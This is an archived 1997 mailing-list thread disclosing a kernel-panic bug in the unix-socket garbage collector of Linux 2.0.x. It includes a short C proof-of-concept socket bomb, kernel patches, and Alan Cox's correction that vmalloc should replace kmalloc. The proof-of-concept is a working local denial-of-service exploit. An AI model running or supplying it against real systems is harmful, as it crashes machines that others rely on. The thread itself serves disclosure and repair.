[Mod: linux-kernel removed from To: list. --alex] -----BEGIN PGP SIGNED MESSAGE----- Kernels 2.0.x do not sufficiently allocate space for the internal stack used for garbage collection on unix domain sockets. I have neither examined nor tested 2.1.x kernels. Because the garbage collection system defines a MAX_STACK depth of 1000 for it''s internal use, it is relatively trivial to write a user-space program which opens up a large number of unix domain sockets, eventually causing a kernel panic in the garbage collection routines (which test for this limit and panic if hit); on systems which have NR_FILE (or /proc/sys/kernel/file-max) set to a value larger than 1024 or so. The solution is slightly more complicated than simply increasing MAX_STACK, due to the fact that a single page is allocated for the stack, and given an i386 architecture, this can only hold 1024 entries. The following illustrates how a user-space program might exploit this bug, causing a kernel panic: - --CUT HERE-- #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> void bomb() { while(1) { while(socket(AF_UNIX, SOCK_STREAM, 0) != -1) ; sleep(5); } } int main() { int i; printf("forking 6 unix socket bomb processes.\n"); fflush(stdout); for(i = 0; i < 6; i++) if(fork() == 0) bomb(); bomb(); return 0; } - --CUT HERE-- I have tested this under 2.0.32 and verified the panic. I have even been able to cause a panic on a system which does NOT have /proc/sys/kernel/file-max > 1024. As a work-around, the following patch will cause the garbage collection routine to calculate the exact _maximum_ stack depth it must allocate for, as well as using kmalloc()/kfree() instead of get_free_page()/free_page(). - --CUT HERE- *** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997 - --- net/unix/garbage.c Wed Dec 3 15:04:57 1997 *************** *** 5,10 **** - --- 5,20 ---- * Copyright (C) Barak A. Pearlmutter. * Released under the GPL version 2 or later. * + * 12/3/97 -- Flood + * Internal stack is only allocated one page. On systems with NR_FILE + * > 1024, this makes it quite easy for a user-space program to open + * a large number of AF_UNIX domain sockets, causing the garbage + * collection routines to run up against the wall (and panic). + * Changed the MAX_STACK to be associated to the system-wide open file + * maximum, and use kmalloc() instead of get_free_page() [as more than + * one page may be necessary]. As noted below, this should ideally be + * done with a linked list. + * * Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem. * If it doesn''t work blame me, it worked when Barak sent it. * *************** *** 59,68 **** /* Internal data structures and random procedures: */ - - #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */ static unix_socket **stack; /* stack of objects to mark */ static int in_stack = 0; /* first free entry in stack */ ! extern inline unix_socket *unix_get_socket(struct file *filp) { - --- 69,77 ---- /* Internal data structures and random procedures: */ static unix_socket **stack; /* stack of objects to mark */ static int in_stack = 0; /* first free entry in stack */ ! static int max_stack; /* Calculated in unix_gc() */ extern inline unix_socket *unix_get_socket(struct file *filp) { *************** *** 110,116 **** extern inline void push_stack(unix_socket *x) { ! if (in_stack == MAX_STACK) panic("can''t push onto full stack"); stack[in_stack++] = x; } - --- 119,125 ---- extern inline void push_stack(unix_socket *x) { ! if (in_stack == max_stack) panic("can''t push onto full stack"); stack[in_stack++] = x; } *************** *** 151,158 **** if(in_unix_gc) return; in_unix_gc=1; ! ! stack=(unix_socket **)get_free_page(GFP_KERNEL); /* * Assume everything is now unmarked - --- 160,170 ---- if(in_unix_gc) return; in_unix_gc=1; ! ! max_stack = max_files; ! ! stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **), ! GFP_KERNEL); /* * Assume everything is now unmarked *************** *** 276,280 **** in_unix_gc=0; ! free_page((long)stack); } - --- 288,292 ---- in_unix_gc=0; ! kfree(stack); } -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNIXFaRsjWkWelde9AQH58wQAh+AaooTq+AcNUVyKc5hIMb04vOmFkoVW 3DaaqFvtlQ9Z0XBnfagWqguNB5HRzEG1MifkhofwXuhy64qAhcev/qZroYqS/Q96 ZeGXsdf4KE3LmZ5PDSrYAIRSgQjKT9A9yw6nRQUNqr/Nis7Fz5y7oQYoo2g12Jjg l9N4fmbmPeY=kPxr -----END PGP SIGNATURE-----
[Mod: linux-kernel and flood@evcom.net (Floody) removed from the To: list -- alex]> program which opens up a large number of unix domain sockets, eventually > causing a kernel panic in the garbage collection routines (which test for > this limit and panic if hit); on systems which have NR_FILE (or > /proc/sys/kernel/file-max) set to a value larger than 1024 or so. TheYep. I know about this. The as shipped systems are all fine, if you up it you need to change it. 2.1.x fixed this a while ago> ! stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **), > ! GFP_KERNEL);This is not good. With a very large set of fd''s you can now have the kmalloc hang forever deadlocking the fd recovery. Use vmalloc and your idea is correct. (see 2.1.x)
Floody
1997-Dec-03 23:18 UTC
Re: [linux-alert] Re: Insufficient allocations in net/unix/garbage.c
On Wed, 3 Dec 1997, Alan Cox wrote:> > program which opens up a large number of unix domain sockets, eventually > > causing a kernel panic in the garbage collection routines (which test for > > this limit and panic if hit); on systems which have NR_FILE (or > > /proc/sys/kernel/file-max) set to a value larger than 1024 or so. The > > Yep. I know about this. The as shipped systems are all fine, if you up > it you need to change it. 2.1.x fixed this a while ago > > > ! stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **), > > ! GFP_KERNEL); > > This is not good. With a very large set of fd''s you can now have the kmalloc > hang forever deadlocking the fd recovery. Use vmalloc and your idea is > correct. > > (see 2.1.x)I see. For everyone else''s benefit, here is an amended patch that correctly uses vmalloc() instead of kmalloc() in order to avoid the possible deadlocks that Alan mentioned. Again, this is only necessary for 2.0.x kernels, when the maximum number of open files has been increased beyond 1024 (which is becoming increasingly common for heavily loaded production servers). *** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997 --- net/unix/garbage.c Thu Dec 4 02:05:47 1997 *************** *** 5,10 **** --- 5,20 ---- * Copyright (C) Barak A. Pearlmutter. * Released under the GPL version 2 or later. * + * 12/3/97 -- Flood + * Internal stack is only allocated one page. On systems with NR_FILE + * > 1024, this makes it quite easy for a user-space program to open + * a large number of AF_UNIX domain sockets, causing the garbage + * collection routines to run up against the wall (and panic). + * Changed the MAX_STACK to be associated to the system-wide open file + * maximum, and use vmalloc() instead of get_free_page() [as more than + * one page may be necessary]. As noted below, this should ideally be + * done with a linked list. + * * Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem. * If it doesn''t work blame me, it worked when Barak sent it. * *************** *** 59,68 **** /* Internal data structures and random procedures: */ - #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */ static unix_socket **stack; /* stack of objects to mark */ static int in_stack = 0; /* first free entry in stack */ ! extern inline unix_socket *unix_get_socket(struct file *filp) { --- 69,77 ---- /* Internal data structures and random procedures: */ static unix_socket **stack; /* stack of objects to mark */ static int in_stack = 0; /* first free entry in stack */ ! static int max_stack; /* Calculated in unix_gc() */ extern inline unix_socket *unix_get_socket(struct file *filp) { *************** *** 110,116 **** extern inline void push_stack(unix_socket *x) { ! if (in_stack == MAX_STACK) panic("can''t push onto full stack"); stack[in_stack++] = x; } --- 119,125 ---- extern inline void push_stack(unix_socket *x) { ! if (in_stack == max_stack) panic("can''t push onto full stack"); stack[in_stack++] = x; } *************** *** 151,158 **** if(in_unix_gc) return; in_unix_gc=1; ! ! stack=(unix_socket **)get_free_page(GFP_KERNEL); /* * Assume everything is now unmarked --- 160,173 ---- if(in_unix_gc) return; in_unix_gc=1; ! ! max_stack = max_files; ! ! stack=(unix_socket **)vmalloc(max_stack * sizeof(unix_socket **)); ! if (!stack) { ! in_unix_gc=0; ! return; ! } /* * Assume everything is now unmarked *************** *** 276,280 **** in_unix_gc=0; ! free_page((long)stack); } --- 291,295 ---- in_unix_gc=0; ! vfree(stack); }
Reasonably Related Threads
- Re: [PATCH v3] v2v: -o rhv-upload: Use Unix domain socket to access imageio (RHBZ#1588088).
- Solution to problem : dynamic variable drops with non-empty dirty list
- [PATCH v3] v2v: -o rhv-upload: Use Unix domain socket to access imageio (RHBZ#1588088).
- v2v: -o rhv-upload: Use Unix domain socket to access imageio (RHBZ#1588088).
- [PATCH] v2v: rhv-upload-plugin: Remove unneeded auth